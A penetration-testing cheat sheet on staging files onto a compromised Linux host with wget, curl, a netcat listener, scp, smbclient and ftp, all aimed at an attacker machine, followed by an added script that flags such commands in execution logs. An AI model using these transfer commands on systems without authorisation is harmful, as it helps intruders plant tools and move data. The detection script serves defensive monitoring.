Transferring Files To Linux

All the ways to download your files when on a Linux machine.

Overview

During an engagement, you may find certain tools do not exist, outbound ports have been blocked, and sometimes the machine is just too buggy to transfer your files the only way you know how. For this reason, I find it helpful to have an array of tools at my disposal. I would recommend practicing all the below examples until you know every way you can transfer a file in your specific scenario.

Wget

wget 192.168.1.1:80/example.txt

A Linux command-line tool that you can find on most machines you will encounter. Use it in conjunction with the HTTP file server described in the previous section.

You can also navigate to the shared files over HTTP by going to http://192.168.1.1:80.

Curl

curl -O http://192.168.1.1:80/example.txt

If not told otherwise, curl writes the received data to stdout. It can be instructed to instead save that data into a local file, using the -o, --output or -O, --remote-name options. Use it in conjunction with the HTTP file server described in the previous section.

You can also navigate to the shared files over HTTP by going to http://192.168.1.1:80.

Netcat

nc -lvp 5555 < example.txt    # Attacker machine (sends the file)
nc 192.168.1.1 5555 > example.txt    # Victim machine (receives the file)

This is one of the rare instances where I include how to host the file as well, since Netcat is such a versatile tool and not just for file transfers. The way I remember the direction of the arrows is that the sending side reads the file in with < and the receiving side writes it out with >. This tool is especially useful in that you can reverse the order and download a file from the victim instead. You do not need to have this file hosted on an HTTP web server, as the hosting is done with netcat.

SSH

scp example.txt username@192.168.1.1:/tmp

This is more niche as it obviously relies on having SSH credentials. If you are authenticating with something like an id_rsa key file instead, adjust the command accordingly but keep the scp and :/tmp parts. The : is not an error here; I have forgotten it too many times. /tmp is whatever directory on the victim you want to transfer the file to.

SMB

smbclient //192.168.1.1/share -U username
smb: \> get example.txt
smb: \> exit

Even if no password is set for the SMB share, you will still have to press enter at the password prompt. /share references the share name and is not a default share name, but I usually name my SMB shares “share” for this reason. The smb: \> prompt appears once you have connected to the share and is not part of the command that you need to run. Refer to the previous section on starting an SMB share.

FTP

ftp 192.168.1.1

After you have entered the connect command, it will prompt you for both the username and password you want to use. Even if you are connecting anonymously, you will still have to enter the anonymous:anonymous credentials. From there, you can navigate the file share like a normal directory. Always use the help command if you are unsure of how to download or upload files.

ftp://192.168.1.1

You can also access FTP on any browser by prepending ftp:// to the address. You will still be prompted for credentials.
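
Seen from the defending side, each command on this page leaves a process-execution record. The script below is an added example, not part of the original page: it classifies logged command lines by transfer tool and remote endpoint. The host=/cmd= log format, the sample lines and the function names are assumptions constructed for illustration.

```shell
# Added example: classify logged command lines by the transfer tools on this page.
# The log format and the sample lines are constructed for illustration.
SAMPLE_LOG='host=web01 user=www-data cmd=/usr/bin/wget 192.168.1.1:80/example.txt
host=web01 user=www-data cmd=ls -la /tmp
host=db02 user=svc cmd=nc 192.168.1.1 5555
host=db02 user=svc cmd=scp example.txt username@192.168.1.1:/tmp'

# classify_transfer "CMDLINE" -> prints "tool remote", or "none".
# The body runs in a subshell so set -f and the positional parameters do not leak.
classify_transfer() (
    set -f                               # never glob-expand log content
    set -- $1                            # word-split the logged argv
    [ $# -gt 0 ] || { echo none; exit 0; }
    tool=${1##*/}; shift                 # /usr/bin/wget -> wget
    case $tool in ncat|netcat) tool=nc ;; esac
    listen=0; pos=
    for a in "$@"; do
        case $a in
            -*) case $tool:$a in nc:-l*|nc:-[a-zA-Z]*l*) listen=1 ;; esac ;;
            *)  pos="$pos $a" ;;         # keep positional arguments only
        esac
    done
    set -- $pos
    case $tool in
        wget|curl|ftp)
            remote=$1                    # prefer an explicit URL if one is present
            for a in "$@"; do case $a in *://*) remote=$a ;; esac; done
            remote=${remote#*://}; remote=${remote%%/*} ;;
        nc)
            # The < and > redirections are handled by the shell and never reach
            # argv, so the direction of an nc transfer is not visible here.
            if [ "$listen" = 1 ]; then remote="listen:$1"; else remote="$1:$2"; fi ;;
        scp)
            remote=                      # user@host:/path -> host
            for a in "$@"; do case $a in *:*) remote=${a%%:*}; remote=${remote#*@} ;; esac; done ;;
        smbclient)
            remote=${1#//}; remote=${remote%%/*} ;;   # //host/share -> host
        *)  echo none; exit 0 ;;
    esac
    echo "$tool ${remote:-?}"
)

# scan_exec_log: read exec-log lines on stdin, print "host tool remote" per hit.
scan_exec_log() {
    while IFS= read -r line; do
        host=${line%% *}; cmd=${line#*cmd=}
        hit=$(classify_transfer "$cmd")
        [ "$hit" = none ] || echo "${host#host=} $hit"
    done
}

printf '%s\n' "$SAMPLE_LOG" | scan_exec_log
```

Because the redirection never appears in the logged arguments, a netcat hit needs to be paired with file-write or network telemetry to tell whether the host sent or received the file.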
